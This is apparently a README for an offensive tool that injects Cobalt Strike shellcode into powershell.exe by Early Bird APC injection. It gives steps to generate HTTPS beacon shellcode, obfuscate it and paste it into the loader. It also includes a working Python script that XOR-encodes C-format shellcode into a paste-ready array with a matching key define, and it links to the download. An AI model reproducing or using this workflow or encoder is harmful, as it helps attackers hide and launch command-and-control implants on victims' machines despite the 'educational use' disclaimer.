A PoC of the Early Bird APC injection technique, implemented with syscalls, targeting powershell.exe.
It injects Cobalt Strike shellcode into powershell.exe using the Early Bird technique: the target process is created in a suspended state, the shellcode is written into it, an APC pointing at the shellcode is queued to the main thread, and the thread is resumed so the APC runs before the process's own entry point does.
- Select a profile picture of your choice.
- Generate x64 HTTPS shellcode in C format.
- Paste the shellcode into encoder.py and run it with Python 2.
- Copy the output and paste it into main.c at https://github.com/ORCA666/EarlyBird/blob/c6be7c912cdaad15b358c44b734c4118e70cb2dd/APC-Injection_updated/main.c#L157
- If you changed the encoding key in encoder.py, change it in main.cpp as well; otherwise the loader decodes the payload with the wrong key and the injected bytes are garbage.
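The encode-then-paste steps above are shown end to end in the following script. It is an added example, not the repository's encoder.py or loader, and it runs under Python 3 rather than the Python 2 the steps call for. The single-byte XOR scheme, the key value 0x5A, the `XOR_KEY` define and the sample input bytes are all assumptions made for illustration; the page does not show the real encoder's scheme. It parses the C-format listing that Cobalt Strike or msfvenom emits, encodes it, prints a C array with the key alongside it so the loader and encoder cannot drift apart, and then performs the same decode the loader would to confirm the round trip.

```python
#!/usr/bin/env python3
"""Illustrative shellcode encoder for the workflow above.

Added example, not the repository's encoder.py. Runs under Python 3.
The encoding scheme (single-byte XOR) and the key are assumptions; the
real encoder's scheme is not shown on the page.
"""
import re
import sys

# Constructed sample input in the C format that Cobalt Strike and msfvenom emit.
# These bytes are nop/int3/ret padding, not a working payload.
SAMPLE_C_SHELLCODE = r'''
/* length: 8 bytes */
unsigned char buf[] =
"\x90\x90\x90\x90"
"\xcc\xc3\x00\x00";
'''

# Assumed key; a change here must be mirrored in the loader that decodes the payload.
DEFAULT_KEY = 0x5A


def parse_c_shellcode(text: str) -> bytes:
    """Pull the \\xNN escapes out of a C-format shellcode listing.

    Comments are stripped first so a stray "\\x" inside a comment is not
    mistaken for payload data.
    """
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"//[^\n]*", "", text)
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def parse_c_array(text: str) -> bytes:
    """Parse the 0xNN initialiser list of a C array, ignoring anything outside the braces."""
    m = re.search(r"\{(.*?)\}", text, flags=re.S)
    if m is None:
        raise ValueError("no array initialiser found")
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9a-fA-F]{2})", m.group(1)))


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR; XOR is its own inverse, so the loader decodes with the same call."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


xor_decode = xor_encode


def to_c_array(data: bytes, name: str = "buf", per_line: int = 12) -> str:
    """Render bytes as a C array initialiser ready to paste into the loader source."""
    rows = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        rows.append("    " + ", ".join(f"0x{b:02x}" for b in chunk) + ",")
    return f"unsigned char {name}[{len(data)}] = {{\n" + "\n".join(rows) + "\n};"


def encode_listing(c_text: str, key: int = DEFAULT_KEY) -> str:
    """Full pipeline: C-format shellcode in, encoded C array plus matching key define out."""
    raw = parse_c_shellcode(c_text)
    if not raw:
        raise ValueError("no \\xNN bytes found in input")
    enc = xor_encode(raw, key)
    # Emit the key next to the array so the loader cannot drift from the encoder.
    return f"#define XOR_KEY 0x{key:02x}\n" + to_c_array(enc)


def roundtrip_ok(c_text: str, key: int = DEFAULT_KEY) -> bool:
    """What the loader does at runtime: decode the pasted array and compare to the original."""
    listing = encode_listing(c_text, key)
    key_in_listing = int(re.search(r"#define XOR_KEY (0x[0-9a-fA-F]{2})", listing).group(1), 16)
    return xor_decode(parse_c_array(listing), key_in_listing) == parse_c_shellcode(c_text)


if __name__ == "__main__":
    # Pipe the C-format shellcode in on stdin; with no pipe, the constructed sample is used.
    src = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_C_SHELLCODE
    print(encode_listing(src))
```

Run it as `python3 encoder_example.py < shellcode.c` and paste the printed array into the loader source. Emitting `#define XOR_KEY` next to the array is the cheap way to avoid the mismatch the last step warns about: the loader includes the key from the same paste, so changing it in the encoder cannot silently leave the loader on the old value.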
This tool is intended strictly for educational use and should not be used for any other purpose.
Download Link: https://github.com/ORCA666/EarlyBird